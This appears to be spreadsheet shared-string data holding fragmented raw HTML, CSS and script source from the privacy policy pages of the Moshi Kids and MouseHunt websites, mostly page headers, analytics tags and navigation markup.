name=search_term_string"}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https://www.moshikids.com/#organization","name":"Moshi Kids","url":"https://www.moshikids.com/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https://www.moshikids.com/#/schema/logo/image/","url":"https://www.moshikids.com/wp-content/uploads/2022/02/moshilogo.svg","contentUrl":"https://www.moshikids.com/wp-content/uploads/2022/02/moshilogo.svg","width":135,"height":45,"caption":"Moshi Kids"},"image":{"@id":"https://www.moshikids.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/PlayMoshiKids/"]}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO Premium plugin.</t>
  </si>
  <si>
    <t>--&gt;
&lt;link rel='dns-prefetch' href='//ajax.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//static.addtoany.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link href='//fonts.googleapis.com' rel='preconnect' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='https://www.moshikids.com/wp-includes/css/dist/block-library/style.min.css?ver=d28282a4c0de2c81ec96f1462cd84f29' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-theme-inline-css' type='text/css'&gt;
.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:"0 0 1em 0"}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
&lt;/style&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.moshikids.com/wp-includes/css/classic-themes.min.css?ver=1'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t>
  </si>
  <si>
    <t>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url('#wp-duotone-blue-orange');--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='styles-css' href='https://www.moshikids.com/wp-content/themes/moshi/style.css?ver=1675865537' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='google-fonts-css' href='//fonts.googleapis.com/css2?family=Lato%3Aital%2Cwght%400%2C300%3B0%2C400%3B0%2C700%3B0%2C900%3B1%2C300%3B1%2C400%3B1%2C700%3B1%2C900&amp;#038;display=swap&amp;#038;ver=1.1' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://www.moshikids.com/wp-content/plugins/svg-support/vendor/DOMPurify/DOMPurify.min.js?ver=1.0.1' id='bodhi-dompurify-library-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js' id='jquery-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.moshikids.com/wp-content/uploads/hummingbird-assets/cc576e099d6ca993f65a79ef0baaf1cb.js' id='wphb-1-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='wphb-1-js-after'&gt;
cssTarget="img.style-svg";ForceInlineSVGActive="false";frontSanitizationEnabled="on";
 &lt;/script&gt;
&lt;link rel='shortlink' href='https://www.moshikids.com/?p=4424' /&gt;
 &lt;meta name="apple-itunes-app" content="app-id=1306719339"&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager for WordPress by gtm4wp.com --&gt;
&lt;!-- GTM Container placement set to off --&gt;
&lt;script data-cfasync="false" data-pagespeed-no-defer&gt;
	var dataLayer_content = {"pageTitle":"Privacy Policy - Moshi","pagePostType":"page","pagePostType2":"single-page","pagePostAuthor":"fiasco","pagePostDate":"29 November 2021","pagePostDateYear":"2021","pagePostDateMonth":"11","pagePostDateDay":"29","pagePostDateDayName":"Monday","pagePostDateHour":"14","pagePostDateMinute":"34","pagePostDateIso":"2021-11-29T14:34:58+00:00","pagePostDateUnix":1638196498,"postFormat":"standard"};
	dataLayer.push( dataLayer_content );
&lt;/script&gt;
&lt;script type="text/javascript"&gt;
	console.warn &amp;&amp; console.warn("[GTM4WP] Google Tag Manager container code placement set to OFF !!!");
	console.warn &amp;&amp; console.warn("[GTM4WP] Data layer codes are active but GTM container must be loaded using custom coding !!!");
&lt;/script&gt;
&lt;!-- End Google Tag Manager for WordPress by gtm4wp.com --&gt;
	&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">TrustBox script --&gt;
&lt;script type="text/javascript" src="//widget.trustpilot.com/bootstrap/v5/tp.widget.bootstrap.min.js" async&gt;&lt;/script&gt;
&lt;!-- End TrustBox script --&gt;
&lt;!-- Pop Up script --&gt;
&lt;script type="text/javascript" data-cookieconsent="marketing"&gt;
	setTimeout(() =&gt; {
		const popUpCookies = Cookies.get("pop-up");
		const popUp = document.querySelector(".pop-up");
		if (popUp &amp;&amp; popUpCookies == null) {
			document.body.classList.add("pop-up-active");
			const quizOptions = document.querySelectorAll(".pop-up__option");
			const quiz = document.querySelector(".pop-up--quiz");
			const email = document.querySelector(".pop-up--email");
			const redirect = document.getElementById("form-redirect");
			if( redirect.value == '' ){
				redirect.value = '/submitted';
			}
			const disclaimerText = document.querySelector(
				".pop-up__disclaimer"
			).innerHTML;
			const disclaimerLabel = document.querySelector(
				".wpforms-field-checkbox ul li label"
			);
			const hiddenField = document.querySelector(
				".wpforms-field-container .wpforms-field-hidden input"
			);
			const introText = document.querySelector(
				".pop-up__med-heading"
			);
			disclaimerLabel.classList.add("pop-up__label");
			</t>
  </si>
  <si>
    <t>disclaimerLabel.innerHTML = disclaimerText;
			const getSiblings = (e) =&gt; {
				// for collecting siblings
				let siblings = [];
				// if no parent, return no sibling
				if (!e.parentNode) {
					return siblings;
				}
				// first child of the parent node
				let sibling = e.parentNode.firstChild;
				// collecting siblings
				while (sibling) {
					if (sibling.nodeType === 1 &amp;&amp; sibling ! == e) {
						siblings.push(sibling);
					}
					sibling = sibling.nextSibling;
				}
				return siblings;
			};
			quizOptions.forEach((option) =&gt; {
				const value = option.dataset.value;
				const text = option.dataset.text;
				const link = option.dataset.link;
				option.addEventListener("click", () =&gt; {
					let siblings = getSiblings(option);
					siblings.forEach((sibling)</t>
  </si>
  <si>
    <t>fill="#010B3B"/&gt;
&lt;path d="M19.8666 24.4263C19.9312 24.1182 19.9965 23.8101 20.06 23.5016C20.4659 21.5349 20.988 19.6047 21.8311 17.7734C22.4315 16.4679 23.1805 15.2617 24.2181 14.2517C25.5465 12.9603 27.1416 12.2459 28.9711 12.0289C29.8666 11.9223 30.7618 11.8939 31.6518 12.0699C33.1222 12.3606 34.3085 13.1274 35.2731 14.258C36.1476 15.2838 36.7406 16.4657 37.1653 17.7354C37.6444 19.1592 37.8996 20.6489 37.9217 22.1511C37.946 23.8241 38.0162 25.4949 38.2169 27.1568C38.4851 29.3759 38.9549 31.5437 39.9094 33.5817C40.8046 35.4989 42.0356 37.1509 43.7849 38.3715C44.3384 38.7567 44.9428 39.0663 45.527 39.4047C45.9096 39.6261 46.3129 39.8157 46.6793 40.0608C47.369 40.5216 47.4911 41.136 47.0631 41.8456C46.7841 42.3079 46.3897 42.6573 45.9424 42.9496C45.1875 43.4433 44.3502 43.706 43.4647 43.8389C41.5334 44.1281 39.7342 43.6544 37.9781 42.9097C35.4247 41.8271 33.5639 40.0143 32.3016 37.5608C31.4529 35.91 30.8817 34.1606 30.4758 32.3581C30.1522 30.919 29.8854 29.4689 29.5814 28.0265C29.4825 27.5586 29.3574 27.0948 29.2124 26.6391C29.1334 26.3935 29.0183 26.1611 28.8707 25.9495C28.5604 25.5067 28.0648 25.445 27.6604 25.81C27.4493 25.9978 27.2713 26.2199 27.1339 26.4668C26.861 26.9611 26.6178 27.4712 26.4055 27.9944C25.8959 29.2859 25.4229 30.5917 24.9222 31.8865C24.4609 33.0798 23.9506 34.2517 23.2986 35.355C22.8267 36.1524 22.2942 36.9026 21.5706 37.4977C20.8769 38.0682 20.0924 38.3652 19.1847 38.2885C18.436 38.2254 17.742 38.0018 17.1103 37.59C16.6173 37.2631 16.1773 36.8626 15.8055 36.4026C15.1976 35.6579 14.6964 34.8321 14.3163 33.9492C13.8735 32.9363 13.4764 31.9035 13.0536 30.8818C12.8322 30.3486 12.6152 29.8117 12.3643 29.2951C12.2248 29.0078 12.0481 28.7401 11.8389 28.4988C11.6829 28.3272 11.4898 28.1934 11.2743 28.1077C10.8769 27.9479 10.5039 28.0815 10.2954 28.4556C10.1408 28.721 10.0241 29.0067 9.94852 29.3043C9.68654 30.4412 9.43747 31.5814 9.21313 32.7263C9.02088 33.7056 8.80244 34.6739 8.39581 35.5904C8.11021 36.2351 7.75561 36.8376 7.27851 37.3616C6.41802 38.3047 5.35755 38.7866 4.07051 38.7457C3.14065 38.7162 2.41927 38.3217 1.91413 37.538C1.48684 36.8738 1.24994 36.1358 1.10899 35.3735C0.766566 33.5285 0.662511 31.6666 0.758817 29.7921C0.82007 28.6003 0.906414 27.4118 1.09829 26.2328C1.43038 24.1831 1.96173 22.1965 2.93069 20.346C3.35466 19.5364 3.85797 18.7803 4.47492 18.1036C5.959 16.4753 7.79583 15.6155 10.0053 15.5576C12.8864 15.4838 15.2469 16.562 17.1047 18.7564C17.7922 19.5681 18.3453 20.4674 18.7947 21.4297C19.1914 22.2784 19.5227 23.1496 19.7013 24.0731C19.7246 24.1931 19.7611 24.31 19.7913 24.4285L19.8666 24.4263Z" fill="#010B3B"/&gt;
&lt;path d="M67.2045 25.211C67.0687 29.2718 65.3134 32.5281 61.9279 34.8672C59.372 36.6343 56.5038 37.3177 53.419 36.9771C49.7007 36.5668 46.7056 34.8506 44.5197 31.8068C42.8467 29.4773 42.1515 26.8445 42.4534 23.9974C42.8323 20.4027 44.5883 17.5824 47.5207 15.4995C49.3963 14.167 51.501 13.4243 53.798 13.2733C57.844 13.0073 61.297 14.3191 64.0799 17.2769C65.8267 19.1337 66.8222 21.3628 67.1182 23.897C67.1672 24.3118 67.1746 24.7309 67.2045 25.211ZM58.7834 25.1435C58.7166 24.6826 58.6838 24.214 58.5764 23.7627C58.2975 22.5889 57.7163 21.5952 56.7089 20.8934C55.5153 20.061 54.0315 20.0713 52.8408 20.9056C52.2734 21.3019 51.812 21.8315 51.4973 22.448C50.6715 24.0502 50.6069 25.6951 51.2704 27.3652C51.5656 28.1094 52.0231 28.7456 52.6571 29.2426C53.3829 29.812 54.2005 30.0913 55.1293 29.9884C56.2573 29.8625 57.0971 29.2633 57.7443 28.3703C58.4384 27.4128 58.7377 26.325 58.7834 25.1435Z"</t>
  </si>
  <si>
    <t>fill="#010B3B"/&gt;
&lt;path d="M81.4038 37.7393C77.8552 37.6865 74.8727 36.7213 72.2709 34.652C71.1975 33.7988 70.768 32.6716 70.844 31.341C70.8931 30.4838 71.3496 29.8687 72.1329 29.509C73.041 29.092 73.9923 28.9802 74.9782 29.1171C75.8848 29.2433 76.7516 29.506 77.5936 29.8606C78.4925 30.2388 79.4142 30.5337 80.398 30.5927C81.0311 30.6296 81.6503 30.5694 82.2466 30.3414C82.5936 30.2122 82.9094 30.011 83.1731 29.751C84.162 28.7684 83.8827 27.1614 82.6171 26.5777C82.0138 26.2999 81.3625 26.2338 80.7105 26.2087C79.7304 26.1718 78.7807 26.3607 77.8357 26.6039C77.0756 26.7991 76.3103 26.9917 75.5358 27.112C74.6067 27.2537 73.657 27.164 72.7709 26.8508C71.7589 26.5017 71.0117 25.8465 70.5293 24.8851C69.9884 23.804 69.795 22.6487 69.8183 21.4535C69.8507 19.7994 70.2957 18.2776 71.3105 16.9467C71.3843 16.8489 71.458 16.7489 71.5418 16.6592C73.1834 14.9021 75.0945 13.5597 77.4339 12.9029C78.9157 12.486 80.4227 12.4786 81.9315 12.7225C84.4664 13.1313 86.7103 14.187 88.6958 15.8036C89.4666 16.4308 90.1249 17.1541 90.5644 18.0577C90.7326 18.4046 90.8452 18.764 90.847 19.1547C90.8507 19.8558 90.5301 20.355 89.9116 20.6602C89.3544 20.9375 88.7148 21.001 88.1139 20.8388C87.7114 20.7287 87.3195 20.5828 86.9431 20.4026C86.3298 20.1196 85.7332 19.8001 85.1266 19.5027C84.0749 18.9861 82.9595 18.7193 81.792 18.6511C81.054 18.6079 80.3784 18.792 79.7555 19.1772C78.7286 19.8123 78.581 21.3214 79.4626 22.1421C80.085 22.7214 80.8415 22.9734 81.6765 23.0306C82.6669 23.0981 83.6384 22.9502 84.6067 22.7675C85.4314 22.6122 86.2549 22.5255 87.0977 22.6531C89.6478 23.0395 91.7868 25.3563 91.9455 27.923C91.9972 28.6599 91.9585 29.4003 91.8304 30.1278C91.6485 31.1148 91.2094 31.9897 90.6127 32.7867C88.853 35.1372 86.5623 36.6965 83.71 37.4183C82.8713 37.6286 82.0263 37.7747 81.4038 37.7393Z" fill="#010B3B"/&gt;
&lt;path d="M134.611 30.679C134.617 31.5254 134.593 32.7162 134.295 33.8829C134.127 34.5405 133.91 35.1774 133.561 35.7648C132.827 36.9998 131.735 37.6139 130.304 37.6364C128.307 37.6677 126.775 36.8275 125.692 35.1593C125.02 34.1261 124.622 32.9782 124.379 31.7782C123.912 29.4753 123.879 27.1658 124.345 24.8592C124.547 23.8585 124.836 22.8769 125.308 21.9666C125.521 21.5514 125.776 21.159 126.069 20.7954C126.661 20.07 127.451 19.7191 128.39 19.7017C131.156 19.6516 133.335 21.3954 133.923 24.1559C134.376 26.2831 134.62 28.0351 134.611 30.679Z" fill="#010B3B"/&gt;
&lt;path d="M129.669 10.2445C130.473 10.2659 131.472 10.5397 132.359 11.1389C133.35 11.8094 133.909 12.7517 133.896 13.9613C133.879 15.8154 132.831 17.0607 131.01 17.4378C129.913 17.6659 128.829 17.5965 127.784 17.1914C126.538 16.7087 125.734 15.8261 125.488 14.4871C125.385 13.931 125.451 13.3857 125.637 12.8543C126.201 11.247 127.665 10.2327 129.669 10.2445Z" fill="#010B3B"/&gt;
&lt;/svg&gt;
				&lt;/a&gt;
				&lt;div class="nav__wrapper"&gt;
					&lt;ul id="menu-mobile" class="nav__mobile"&gt;&lt;li id="menu-item-11154" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11154"&gt;&lt;a</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" class="Hitgrab"&gt;&lt;head&gt;&lt;title&gt;MouseHunt | HitGrab's Privacy Policy&lt;/title&gt;&lt;link id='favicon' rel='SHORTCUT ICON' href='https://www.mousehuntgame.com/favicon.ico' /&gt;&lt;meta http-equiv='Content-Type' content='text/html; charset=utf-8' /&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Libre+Baskerville|Old+Standard+TT" rel="stylesheet"&gt;&lt;meta property='UUID' content='b0195eda-b49e-41b6-bfb0-cc5aed00a181' /&gt;&lt;meta property="viewport" content="width=device-width,initial-scale=1" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="fb:app_id" content="10337532241" /&gt;&lt;meta property="og:site_name" content="MouseHunt" /&gt;&lt;meta property="og:type" content="mousehunt:game" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:url" content="https://www.mousehuntgame.com/" /&gt;&lt;meta property="og:title" content="MouseHunt - MouseHunt" /&gt;&lt;meta property="og:description" content="MouseHunt is a fun adventure game where players engage in royal quests as a MouseHunter, hired by the King, to catch the unique and ridiculous mice that have invaded the kingdom!"</t>
  </si>
  <si>
    <t>/&gt;&lt;meta property="og:determiner" content="auto" /&gt;&lt;meta property="twitter:creator" content="@mousehunt" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="twitter:title" content="MouseHunt - MouseHunt" /&gt;&lt;meta property="twitter:description" content="MouseHunt is a fun adventure game where players engage in royal quests as a MouseHunter, hired by the King, to catch the unique and ridiculous mice that have invaded the kingdom!" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="twitter:image:alt" content="MouseHunt artwork for MouseHunt" /&gt;&lt;meta property="twitter:card" content="app" /&gt;&lt;meta property="og:image" content="https://www.mousehuntgame.com/images/icon_open_graph.png" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:image:secure_url" content="https://www.mousehuntgame.com/images/icon_open_graph.png" /&gt;&lt;meta property="twitter:app:country" content="Canada" /&gt;&lt;meta property="twitter:app:name:iphone" content="MouseHunt" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="twitter:app:id:iphone" content="546110375" /&gt;&lt;meta property="twitter:app:url:iphone" content="https://itunes.apple.com/us/app/mousehunt-by-hitgrab/id546110375?mt=8" /&gt;&lt;meta property="twitter:app:name:googleplay" content="MouseHunt" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="twitter:app:id:googleplay" content="com.hitgrab.android.mousehunt" /&gt;&lt;meta property="twitter:app:url:googleplay" content="https://play.google.com/store/apps/details?id=com.hitgrab.android.mousehunt" /&gt;&lt;script type="text/javascript" src="https://www.mousehuntgame.com/js/package/jquery.js?v=2&amp;t=1681311919"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://www.mousehuntgame.com/js/package/libraries.js?v=2&amp;t=1681311919"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://www.mousehuntgame.com/js/package/app.js?v=2&amp;t=1681311919"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://www.mousehuntgame.com/js/package/pages.js?v=2&amp;t=1681311920"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://www.mousehuntgame.com/js/package/page_templates.js?v=2&amp;t=1681311921"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://www.mousehuntgame.com/js/package/views.js?v=2&amp;t=1681311922"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://www.mousehuntgame.com/js/package/view_templates.js?v=2&amp;t=1681311924"&gt;&lt;/script&gt;&lt;link type="text/css" rel="stylesheet" href="https://www.mousehuntgame.com/css/package/app.css?v=2&amp;t=1681311920" /&gt;&lt;link</t>
  </si>
  <si>
    <t>type="text/css" rel="stylesheet" href="https://www.mousehuntgame.com/css/package/pages.css?v=2&amp;t=1681311921" /&gt;&lt;link type="text/css" rel="stylesheet" href="https://www.mousehuntgame.com/css/package/views.css?v=2&amp;t=1681311924" /&gt;&lt;script async type="text/javascript" src="https://platform.twitter.com/widgets.js"&gt;&lt;/script&gt;&lt;script async type="text/javascript" src="https://www.paypal.com/sdk/js?client-id=AbDtEhDKgy5Yz_AHpWKncgKcDMBuqETmIbcxUvMh1RaDyGK1lOfzGnJ5x-9s"&gt;&lt;/script&gt;&lt;script async type="text/javascript" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" data-ad-client="ca-pub-3148384580319077" id="adsenseLibrary"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;$(document).ready(function() {sn = 'Hitgrab';
canvaspageurl = 'https://www.mousehuntgame.com/';
externalpageurl = 'https://www.mousehuntgame.com/';
facebookpageurl = 'https://apps.facebook.com/mousehunt/';
facebookappid = '10337532241';
 appname = 'MouseHunt';
callbackip = 'www.mousehuntgame.com';
callbackurl = 'https://www.mousehuntgame.com/';
cdnurl = 'https://www.mousehuntgame.com/';
defaultpaymentsource = 'paypal';
donationsdisabled = '';
assetPackageHash = '2b00d8b02cc';
userEmail = '';
useLegacyPaypalForms = '';
messenger = new Messenger();
app.views.OnboardingTutorialView.tutorial = new hg.views.</t>
  </si>
  <si>
    <t>OnboardingTutorialView();
app.views.HeadsUpDisplayView.hud = new hg.views. HeadsUpDisplayView();
user = [];
SocialFramework.init({"social_framework":"Hitgrab","emulate_fbjs":true,"in_frame":false,"allow_user_stream_posts":true,"allow_friend_stream_posts":false});
messenger.registerUI('notification', new MessengerUINotification());
messenger.registerUI('page', new MessengerUIPage());
messenger.registerUI('popup', new MessengerUIPopup());
messenger.registerUI('arrow', new MessengerUIInfoArrow());
messenger.registerUI('message_model', new MessengerUIModelMessage());;
preloadImages(["https:\/\/www.mousehuntgame.com\/images\/buttons\/checkout.gif"]);
hg.views.</t>
  </si>
  <si>
    <t>AdView.registerProvider('adsense', hg.views. AdGoogleAdSenseView) ;
$.ajaxSetup({data: { sn: SocialFramework.getSocialFramework(), hg_is_ajax: 1 }});;
app.views.OnboardingTutorialView.tutorial.init();
messenger.setMessageData({"page":{"newMessageCount":0,"messageCount":0,"messages":[]},"notification":{"newMessageCount":0,"messageCount":0},"popup":{"newMessageCount":0,"messageCount":0,"messages":[]},"arrow":{"newMessageCount":0,"messageCount":0,"messages":[]},"custom":{"newMessageCount":0,"messageCount":0,"messages":[]},"game_request":{"newMessageCount":0,"messageCount":0},"message_model":{"newMessageCount":0,"messageCount":0,"messages":[]},"corkboard_map":{"newMessageCount":0,"messageCount":0},"corkboard_team":{"newMessageCount":0,"messageCount":0},"social_gift_counter":{"newMessageCount":0,"messageCount":0},"egg_carton":{"newMessageCount":0,"messageCount":0}});;
hg.views.MousehuntMenuView.init();
hg.views.MousehuntHeaderView.init();
hg.views.AdView.init();
hg.utils.PageUtil.setRoutes({"AccountStatus":"accountstatus.php","Adversaries":"adversaries.php","Camp":"camp.php","Forum":"forum.php","Friends":"friends.php","HunterProfile":"profile.php","Inventory":"inventory.php","Item":"i.php","JoinDiscord":"discord.php","Journal":"journal.php","ClaimGift":"claimgift.php","Login":"login.php","MarketplaceLegacy":"marketplace_legacy.php","News":"news.php","NewsPost":"newspost.php","NewsArchives":"newsarchives.php","Preferences":"preferences.php","Puzzle":"camp.php","Shops":"shops.php","Team":"team.php","Title":"title.php","Tournament":"tournament.php","Travel":"travel.php","Receipt":"receipt.php","Scoreboards":"scoreboards.php"});
hg.utils.</t>
  </si>
  <si>
    <t>PageUtil.setRouteAliases({"Camp":{"Buy":"buy.php","Puzzle":"puzzle.php"},"Adversaries":{"M":"m.php"},"Item":{"I":"i.php"},"HunterProfile":{"P":"p.php"}});
});&lt;/script&gt;&lt;script async src="https://www.googletagmanager.com/gtag/js?id=AW-959634568"&gt;&lt;/script&gt;&lt;script&gt;window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());gtag('config', 'AW-959634568');&lt;/script&gt;&lt;script&gt;!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js');fbq('init', '221549616289446');fbq('track', 'PageView');&lt;/script&gt;&lt;noscript&gt;&lt;img height="1" width="1" style="display:none"src="https://www.facebook.com/tr?id=221549616289446&amp;ev=PageView&amp;noscript=1"/&gt;&lt;/noscript&gt;&lt;/head&gt;&lt;body class="PagePrivacyPolicy event spring_hunt hasSidebar"&gt;&lt;div id="fb-root"&gt;&lt;/div&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PF94LVT"height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;div id="noscript" style="display:none;"&gt;&lt;/div&gt;&lt;div class="pageFrameView"&gt;&lt;div class="pageFrameView-column left"&gt;&lt;/div&gt;&lt;div class="pageFrameView-contentContainer"&gt;&lt;div class="pageFrameView-content"&gt;&lt;div id="overlayContainer"&gt;&lt;div id="mousehuntContainer" class="PagePrivacyPolicy" data-page="PagePrivacyPolicy" data-tab="" data-sub-tab=""&gt;&lt;div id="mousehuntHud" class="gameHeader"&gt;&lt;div</t>
  </si>
  <si>
    <t>class="mousehuntHeaderView"&gt;&lt;div class="mousehuntHeaderView-gameBanner"&gt;&lt;a class="banner" target="_self" href="#" onclick="MHCheckout.showItemInfo('20eggstra_charge_charms', 'MousehuntHeaderView', 'reward_banner'); return false;"&gt;&lt;img src="https://www.mousehuntgame.com/images/promo/page_banners/spring_egg_hunt/eggstra_charge_charm_page_banner.jpg" title="Double your eggs and find more Chocolatonium with Eggstra Charge Charms!" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="mousehuntHeaderView-likeRewards clear-block"&gt;&lt;div style="margin: 0 auto; text-align: center; margin-bottom: 10px;"&gt;&lt;a class="fanBaseReward" href="fanbase.php" target="_parent"&gt;&lt;img src="https://www.mousehuntgame.com/images/promo/likerewards/fanbase.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntHeaderView-gameTabs"&gt;&lt;a href="#" id="hgbar_messages" class="menuItem first inbox " onclick="messenger.</t>
  </si>
  <si>
    <t>UI['notification'].togglePopup(); return false;"&gt;Inbox&lt;span class="mousehuntHeaderView-menu-notification"&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="https://www.mousehuntgame.com/profile.php?snuid=" class="menuItem myProfile" onclick="hg.utils. PageUtil.showHunterProfile(); return false;"&gt;My Profile&lt;/a&gt;&lt;a href="#" id="hgbar_freegifts" class="menuItem freeGifts  " onclick="hg.views.GiftSelectorView.showInbox(); return false;"&gt;Gifts&lt;span class="mousehuntHeaderView-menu-notification"&gt;0&lt;/span&gt;&lt;/a&gt;&lt;a href="https://www.mousehuntgame.com/discord.php" class="menuItem chat" onclick="hg.utils. PageUtil.setPage('JoinDiscord')</t>
  </si>
  <si>
    <t>; return false;"&gt;Discord&lt;/a&gt;&lt;a href="#" onclick="MHCheckout.show('MousehuntHeaderView', 'checkout_button'); return false;" class="menuItem premiumShop"&gt;Item Shop&lt;/a&gt;&lt;a href="#" onclick="MHCheckout.showSuperBrie('MousehuntHeaderView', 'reward_banner'); return false;" class="menuItem superBrie"&gt;SUPER|brie+: &lt;span class="quantity"&gt;0&lt;/span&gt;&lt;span class="getMore"&gt;Get More&lt;/span&gt;&lt;/a&gt;&lt;div class="mousehuntHeaderView-dropdownContainer"&gt;&lt;a href="preferences.php" class="menuItem settings" onclick="hg.utils. PageUtil.setPage('Preferences'); return false;"&gt;Settings&lt;/a&gt;&lt;div class="menuItem dropdown community"&gt;Community&lt;div class="arrow"&gt;&lt;/div&gt;&lt;div class="dropdownContent"&gt;&lt;a href="https://www.mousehuntgame.com/forum/index.php?hgref=hgbar" class="forum"&gt;&lt;b&gt;Forum&lt;/b&gt;&lt;span&gt;Take part in discussions with your fellow players.&lt;/span&gt;&lt;/a&gt;&lt;a href="https://www.facebook.com/pages/MouseHunt/273678496019476" class="fanPage" target="_blank"&gt;&lt;b&gt;Fan Page&lt;/b&gt;&lt;span&gt;Stop by the fan page and check out the recent updates.&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div 